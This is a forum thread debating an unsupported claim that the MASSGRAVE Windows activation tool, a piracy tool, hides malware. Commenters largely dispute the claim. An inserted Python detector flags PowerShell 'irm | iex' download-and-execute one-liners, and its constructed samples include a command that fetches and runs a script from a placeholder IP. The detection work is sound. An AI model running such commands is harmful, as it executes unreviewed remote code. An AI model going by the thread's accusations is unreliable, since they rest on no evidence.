There is a potential BYTECODE virus in the “OPEN SOURCE” Microsoft products MASSGRAVE activator. Here is how the virus is hidden and created AT RUN TIME!
https://github.com/massgravel/Microsoft-Activation-Scripts
I ran the MASSGRAVE “open source” activator on a virtual machine using VMware Workstation. The “open source” code actually also contains “BYTECODE” sections. WHEN YOU RUN THE “HARMLESS LOOKING open source” script, IT basically constructs several virus exe files during runtime FROM THE BYTECODE SECTION !!
TSforge_Activation.exe, TSforgeCLI.exe, LibTSforge.dll
These exe files are what does the activation. It also installs backdoors, and potential malware !!
Can some other developer verify this on a virtual machine?
Please spread this message to more advanced Software engineers who understand “BYTECODE” HIDING and exe construction IN OPENSOURCE SCRIPTS AND HAVE THEM TAKE A LOOK AT IT! Also the first method makes you trust their website! You don’t know what you are downloading from them!
I tried to post this on Reddit, but Reddit is blocking this!
> IT basically constructs several virus exe files during runtime FROM THE BYTECODE SECTION !!
what kind of viruses? what do they do? did you notice anything objectively bad that they do? or something fishy other than creating executables?
> These exe files are what does the activation. It also installs backdoors, and potential malware !!
could you provide a little more details on what kind of backdoors does it install? and what malware?
this could be a big deal, but you didn’t provide anything that could be verified.
Dude, even Microsoft engineers use/trust that script. Why do you think it’s still up on GitHub?
What you’re saying here may be a valid concern, I don’t know. I gotta say though, the way you’re presenting it discourages people from taking you seriously.
The dramatic language, exclamation points everywhere, the OVERUSE of ALL CAPS for EMPHASIS and so on makes this feel like some Qanon nonsense from Aunt Karen, and the eyes glaze over very quickly while trying to decipher it.
Just a friendly note for future posts, you can take it or leave it.
Starting at line 6040, the Constants class. That isn’t bytecode, those are binary blobs that look like licensing/hardware identifiers. Given those byte arrays are named for HWID and KMS that would make sense. They are also only being used for versioning calls for KMS4k (Key Management Service). There isn’t anything suspicious about that.
Sounds like FUD to me.
Tough audience here, huh?
Have you tried checking what the bytecode does? Maybe it’s just a way to block detection by Microsoft and antivirus programs, by creating a different binary every time. Just because something isn’t written in a high level language doesn’t mean it’s malicious. But it may be.
The IRM command in PowerShell downloads a script from a specified URL, and the IEX command executes it.
Always double-check the URL before executing the command and verify the source if manually downloading files.
Be cautious, as some spread malware disguised as MAS by using different URLs in the IRM command.
Are you positive that you downloaded the correct files?
https://massgrave.dev/blog/tsforge
Here is what tsforge does.
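The advice earlier in the thread, to check the URL in an `irm ... | iex` command before it runs, can be turned into a check over recorded PowerShell command lines. This is an added example, not part of any post in this thread and not code from the MAS project; the allowlisted host, the sample lines and the function names are constructed placeholders.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts you have reviewed and trust (constructed placeholder).
ALLOWED_HOSTS = {"scripts.example.com"}

DOWNLOAD = r"(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)"
EXECUTE = r"(?:iex|Invoke-Expression)"
# First argument that looks like a URL or bare host; the scheme is optional
# because such one-liners may be written without it.
URL = r"""['"]?(?P<url>(?:https?://)?[\w.-]+\.\w+[^\s'"|)]*)"""

PATTERNS = [
    # irm <url> | iex
    re.compile(rf"\b{DOWNLOAD}\b[^|]*?\s{URL}[^|]*\|\s*{EXECUTE}\b", re.I),
    # iex (irm <url>)
    re.compile(rf"\b{EXECUTE}\b\s*\(\s*{DOWNLOAD}\b[^)|]*?\s{URL}", re.I),
]

def find_download_exec(line):
    """Return (url, host, allowed) for a download-and-execute one-liner, else None."""
    for pat in PATTERNS:
        m = pat.search(line)
        if m:
            url = m.group("url")
            # Exact host comparison: a look-alike that merely contains a
            # trusted name must not pass.
            host = urlsplit(url if "://" in url else "http://" + url).hostname
            return url, host, host in ALLOWED_HOSTS
    return None

def triage(lines):
    """Return (host, line) for download-and-execute lines outside the allowlist."""
    hits = ((find_download_exec(line), line) for line in lines)
    return [(hit[1], line) for hit, line in hits if hit and not hit[2]]

# Constructed sample command lines (not taken from any real log).
SAMPLE_LINES = [
    "irm https://scripts.example.com/setup.ps1 | iex",
    "irm https://scripts-example.com.mirror.test/setup.ps1 | iex",  # look-alike
    "IEX (Invoke-RestMethod -Uri 'http://198.51.100.7/a.ps1')",
    "Invoke-RestMethod https://scripts.example.com/api/status",  # download only
]

if __name__ == "__main__":
    for host, line in triage(SAMPLE_LINES):
        print(f"UNREVIEWED HOST {host}: {line}")
```

The comparison is on the parsed hostname rather than a substring of the command, which is what catches the look-alike line.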
I love posts like these. I have no idea what I’m reading half the time, but whatever they’re doing sounds interesting!
Do you have any actual evidence of this malicious code besides writing with your caps lock on? Frankly, this reads like some poorly-veiled astroturfing to sow distrust in what, as far as I can tell, is the most popular Windows piracy tool.
Ok, so what “back doors” does it install?
Claims without evidence are just that - claims. I see nothing you’ve posted to be evidentiary.
That said, there is potential for malicious behaviour, but let’s not go off half-cocked on this.
> Please spread this message to more advanced Software engineers who understand “BYTECODE” HIDING and exe construction IN OPENSOURCE SCRIPTS AND HAVE THEM TAKE A LOOK AT IT!
I believe chain letter is the word?